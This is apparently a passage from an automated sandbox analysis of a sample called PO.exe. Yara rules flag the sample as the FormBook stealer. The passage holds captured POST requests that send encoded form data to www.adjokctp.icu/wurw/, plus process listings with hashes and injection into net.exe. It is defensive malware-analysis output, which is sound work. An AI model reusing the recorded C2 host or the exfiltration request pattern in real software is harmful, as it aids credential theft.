                                                                                              Data Ascii: 92tD=Nl7115RM8ZJ0JmVZtAujyMmi/ctn7+QpzI76cI0Fvi2FyIxAc9gSayH+kJeblhQHzuKJhCsOfAPgNgGT6Xtgx+PVsjWSrWoxEa1dAFJevcbNJXNHuYa3Ru9RUkJojtTI7qY0szpJyj9U4OqfGN6DsI3udG6CE+1FWeB4X1TJzDwB5uG2YTDOB7eCMUML4ZB9gQ==
                                                                                               Feb 11, 2025 18:53:42.064608097 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                              Date: Tue, 11 Feb 2025 17:53:42 GMT
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              X-Address: gin_throttle_mw_7200000000_8.46.123.189
                                                                                              X-Ratelimit-Limit: 500
                                                                                              X-Ratelimit-Remaining: 498
                                                                                              X-Ratelimit-Reset: 1739299975
                                                                                              cf-cache-status: DYNAMIC
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=C%2BbFWWk0NCq0lmB%2BD1%2B%2BfjZSpXs1KQz1i%2FXJtyJmeztwhxcNwmTn91wxOg%2BoffiQCSJzveIK1W%2Bj2GvUOPbbkf0AK3%2FkGiVw%2BZFjLFfI26i3bf%2Fh%2BqkYL2Qd4md30VGApwbW"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 9106332c5afc4252-EWR
                                                                                              Content-Encoding: gzip
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1534&min_rtt=1534&rtt_var=767&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=715&delivery_rate=0&cwnd=233&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                              Data Raw: 31 34 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 54 51 4d 6b 02 41 0c bd fb 2b 74 0e 65 06 b7 a3 d2 9b bb 6b 29 a5 b7 42 a1 1f a7 22 65 9c cd 8e 83 63 b2 64 b3 5a 11 ff 7b d9 da 56 7a 08 bc 07 c9 cb 7b 49 d1 7a 8e 8d 2c 06 09 64 08 25 c2 7e f8 f6 fc a8 f7 11 2b da db 44 de 49 24 b4 6b 86 da e4 60 1b 27 6b 74 5b 28 d5 44 d4 f8 c2 f3 7e 9c 4a b0 42 2f c2 11 83 36 39 ba 5d 0c 4e 88 ad 27 da 44 78 40 b7 4a 50 5d 5d 8d ea 0e 7d 2f ab c1 1c 6b 62 bd 73 3c a4 f2 5d 05 a2 90 60 45 a2 32 b5 8a 18 ce e8 e0 b0 82 cf 33 ae 3a bf e9 eb cc da d4 71 d3 f7 ba 58 75 6d 13 2b 60 95 a9 da f9 1f 8d e8 3e 1c fb 75 dc 01 ab 65 26 df f6 1e 69 0f 7c ef 5a d0 26 c3 72 9a 63 41 36 01 06 59 e7 38 1e 9b 58 6b b1 b1 5f f8 54 6b 7a c7 a5 59 5c cf 0c 83 74 8c a3 69 fe 03 66 27 7d 49 d7 b5 c0 77 01 50 cc 6d 0b f2 1a b7 40 9d 68 fd 17 d2 1c 2b f2 dd 16 50 fe df b3 a4 93 c9 66 70 63 e6
                                                                                              Data Ascii: 14aTQMkA+tek)B"ecdZ{Vz{Iz,d%~+DI$k`'kt[(D~JB/69]N'Dx@JP]]}/kbs<]`E23:qXum+`>ue&i|Z&rcA6Y8Xk_TkzY\tif'}IwPm@h+Pfpc
                                                                                               Feb 11, 2025 18:53:42.064634085 CET | 71 | IN | Data Raw: 9e b0 a5 04 36 51 d0 6a 25 ca e4 83 62 f2 fb 98 41 d1 0c 5b 39 24 28 95 a7 44 3c 0f ec 0e b9 5a 30 54 91 c1 8b b5 b6 98 34 8b 2f 00 00 00 ff ff 0d 0a 62 0d 0a e3 02 00 10 26 73 2a ca 01 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                              Data Ascii: 6Qj%bA[9$(D<Z0T4/b&s*0


                                                                                               Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                               14 | 192.168.2.4 | 50023 | 104.21.35.208 | 80 | 5580 | C:\Program Files (x86)\MFyyXNJsIJBrxXBtXpEWYVyOfacuSaJmNvnqPccUNOoklODrDWfmLgCG\vfAu7gBmmnuGpQ5Y.exe
                                                                                               Timestamp | Bytes transferred | Direction | Data
                                                                                               Feb 11, 2025 18:53:44.200117111 CET | 735 | OUT | POST /wurw/ HTTP/1.1
                                                                                              Host: www.adjokctp.icu
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Accept-Language: en-US
                                                                                              Cache-Control: no-cache
                                                                                              Content-Length: 221
                                                                                              Connection: close
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Origin: http://www.adjokctp.icu
                                                                                              Referer: http://www.adjokctp.icu/wurw/
                                                                                              User-Agent: Mozilla/5.0 (Linux; Android 5.0; RCT6773W22B Build/LRX21M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Safari/537.36
                                                                                              Data Raw: 39 32 74 44 3d 4e 6c 37 31 31 35 52 4d 38 5a 4a 30 50 43 70 5a 72 6e 79 6a 7a 73 6d 6c 6a 73 74 6e 69 75 51 79 7a 50 7a 36 63 4e 4e 41 75 55 6d 46 7a 74 4e 41 4f 70 38 53 5a 79 48 2b 76 70 65 43 72 42 51 79 7a 75 57 33 68 44 41 4f 66 42 72 67 4e 6b 4b 54 36 41 5a 6e 33 2b 50 62 31 54 57 51 30 47 6f 78 45 61 31 64 41 46 64 30 76 63 54 4e 4b 6b 6c 48 76 39 32 32 66 4f 39 4f 64 45 4a 6f 30 64 54 4d 37 71 59 57 73 79 31 33 79 68 31 55 34 4c 57 66 47 63 36 45 6d 49 33 73 41 57 37 55 4b 75 45 4b 54 37 77 55 50 56 62 78 38 52 39 67 31 49 4c 73 4a 69 69 5a 54 37 36 78 52 54 46 2f 31 61 38 30 37 62 48 53 4e 55 33 30 77 62 53 66 32 4d 6b 50 2b 55 73 64 30 42 55 3d
                                                                                              Data Ascii: 92tD=Nl7115RM8ZJ0PCpZrnyjzsmljstniuQyzPz6cNNAuUmFztNAOp8SZyH+vpeCrBQyzuW3hDAOfBrgNkKT6AZn3+Pb1TWQ0GoxEa1dAFd0vcTNKklHv922fO9OdEJo0dTM7qYWsy13yh1U4LWfGc6EmI3sAW7UKuEKT7wUPVbx8R9g1ILsJiiZT76xRTF/1a807bHSNU30wbSf2MkP+Usd0BU=
                                                                                               Feb 11, 2025 18:53:44.837663889 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                              Date: Tue, 11 Feb 2025 17:53:44 GMT
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              X-Address: gin_throttle_mw_7200000000_8.46.123.189
                                                                                              X-Ratelimit-Limit: 500
                                                                                              X-Ratelimit-Remaining: 497
                                                                                              X-Ratelimit-Reset: 1739299975
                                                                                              cf-cache-status: DYNAMIC
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DIU0Icl8q2seHbkSbfot0rAKLxamInH9P%2BQSABm1V2lCCDAQ%2BUD7gE5SsTdYYQLbxtKtV08zJsA5MRwqNB8SBGTV3VlXzrHuZdUWEXE5NuqTywpGZrdaoZYF91X8y%2Bhe8QPR"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 9106333dce1b425c-EWR
                                                                                              Content-Encoding: gzip
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1590&min_rtt=1590&rtt_var=795&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=735&delivery_rate=0&cwnd=224&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                              Data Raw: 31 35 35 0d 0a 1f 8b 08 00 00 00 00 00 00 03 54 51 4d 6b 02 41 0c bd fb 2b 74 0e 65 06 b7 a3 d2 9b bb 6b 29 a5 b7 42 a1 1f a7 22 65 9c cd 8e 83 63 b2 64 b3 5a 11 ff 7b d9 da 56 7a 08 bc 07 c9 cb 7b 49 d1 7a 8e 8d 2c 06 09 64 08 25 c2 7e f8 f6 fc a8 f7 11 2b da db 44 de 49 24 b4 6b 86 da e4 60 1b 27 6b 74 5b 28 d5 44 d4 f8 c2 f3 7e 9c 4a b0 42 2f c2 11 83 36 39 ba 5d 0c 4e 88 ad 27 da 44 78 40 b7 4a 50 5d 5d 8d ea 0e 7d 2f ab c1 1c 6b 62 bd 73 3c a4 f2 5d 05 a2 90 60 45 a2 32 b5 8a 18 ce e8 e0 b0 82 cf 33 ae 3a bf e9 eb cc da d4 71 d3 f7 ba 58 75 6d 13 2b 60 95 a9 da f9 1f 8d e8 3e 1c fb 75 dc 01 ab 65 26 df f6 1e 69 0f 7c ef 5a d0 26 c3 72 9a 63 41 36 01 06 59 e7 38 1e 9b 58 6b b1 b1 5f f8 54 6b 7a c7 a5 59 5c cf 0c 83 74 8c a3 69 fe 03 66 27 7d 49 d7 b5 c0 77 01 50 cc 6d 0b f2 1a b7 40 9d 68 fd 17 d2 1c 2b f2 dd 16 50 fe df b3 a4 93 c9 66 70 63 e6 9e b0 a5 04 36 51 d0 6a 25 ca e4 83 62 f2 fb 98
                                                                                              Data Ascii: 155TQMkA+tek)B"ecdZ{Vz{Iz,d%~+DI$k`'kt[(D~JB/69]N'Dx@JP]]}/kbs<]`E23:qXum+`>ue&i|Z&rcA6Y8Xk_TkzY\tif'}IwPm@h+Pfpc6Qj%b
                                                                                              Feb 11, 2025 18:53:44.837682962 CET50INData Raw: 41 d1 0c 5b 39 24 28 95 a7 44 3c 0f ec 0e b9 5a 30 54 91 c1 8b b5 b6 98 34 8b 2f 00 00 00 ff ff e3 02 00 10 26 73 2a ca 01 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                              Data Ascii: A[9$(D<Z0T4/&s*0

                                                                                              Target ID:0
                                                                                              Start time:12:51:38
                                                                                              Start date:11/02/2025
                                                                                              Path:C:\Users\user\Desktop\PO.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\Users\user\Desktop\PO.exe"
                                                                                              Imagebase:0xbc0000
                                                                                              File size:781'824 bytes
                                                                                              MD5 hash:351A691669ABF4DCBDB3F393B2F3E183
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:low
                                                                                              Has exited:true

                                                                                              Target ID:2
                                                                                              Start time:12:51:41
                                                                                              Start date:11/02/2025
                                                                                              Path:C:\Users\user\Desktop\PO.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\Users\user\Desktop\PO.exe"
                                                                                              Imagebase:0xa70000
                                                                                              File size:781'824 bytes
                                                                                              MD5 hash:351A691669ABF4DCBDB3F393B2F3E183
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Yara matches:
                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2274480081.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2275144613.0000000001460000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2276815153.0000000001A10000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                              Reputation:low
                                                                                              Has exited:true

                                                                                              Target ID:6
                                                                                              Start time:12:52:21
                                                                                              Start date:11/02/2025
                                                                                              Path:C:\Program Files (x86)\MFyyXNJsIJBrxXBtXpEWYVyOfacuSaJmNvnqPccUNOoklODrDWfmLgCG\vfAu7gBmmnuGpQ5Y.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\Program Files (x86)\MFyyXNJsIJBrxXBtXpEWYVyOfacuSaJmNvnqPccUNOoklODrDWfmLgCG\lp0hQtG6P0.exe"
                                                                                              Imagebase:0x970000
                                                                                              File size:143'872 bytes
                                                                                              MD5 hash:9C98D1A23EFAF1B156A130CEA7D2EE3A
                                                                                              Has elevated privileges:false
                                                                                              Has administrator privileges:false
                                                                                              Programmed in:C, C++ or other language
                                                                                              Yara matches:
                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3003894654.00000000027B0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                              Reputation:moderate
                                                                                              Has exited:false

                                                                                              Target ID:7
                                                                                              Start time:12:52:24
                                                                                              Start date:11/02/2025
                                                                                              Path:C:\Windows\SysWOW64\net.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\Windows\SysWOW64\net.exe"
                                                                                              Imagebase:0xc50000
                                                                                              File size:47'104 bytes
                                                                                              MD5 hash:31890A7DE89936F922D44D677F681A7F
                                                                                              Has elevated privileges:false
                                                                                              Has administrator privileges:false
                                                                                              Programmed in:C, C++ or other language
                                                                                              Yara matches:
                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3001987219.0000000000420000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3003697143.0000000000970000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3003792289.00000000009C0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                              Reputation:high
                                                                                              Has exited:false

                                                                                              Target ID:8
                                                                                              Start time:12:52:39
                                                                                              Start date:11/02/2025
                                                                                              Path:C:\Program Files (x86)\MFyyXNJsIJBrxXBtXpEWYVyOfacuSaJmNvnqPccUNOoklODrDWfmLgCG\vfAu7gBmmnuGpQ5Y.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\Program Files (x86)\MFyyXNJsIJBrxXBtXpEWYVyOfacuSaJmNvnqPccUNOoklODrDWfmLgCG\7Qeewu5lIKK.exe"
                                                                                              Imagebase:0x970000
                                                                                              File size:143'872 bytes
                                                                                              MD5 hash:9C98D1A23EFAF1B156A130CEA7D2EE3A
                                                                                              Has elevated privileges:false
                                                                                              Has administrator privileges:false
                                                                                              Programmed in:C, C++ or other language
                                                                                              Yara matches:
                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.3003263592.0000000000CD0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                              Reputation:moderate
                                                                                              Has exited:false

                                                                                              Target ID:9
                                                                                              Start time:12:52:51
                                                                                              Start date:11/02/2025
                                                                                              Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                              Imagebase:0x7ff6bf500000
                                                                                              File size:676'768 bytes
                                                                                              MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                              Has elevated privileges:false
                                                                                              Has administrator privileges:false
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:true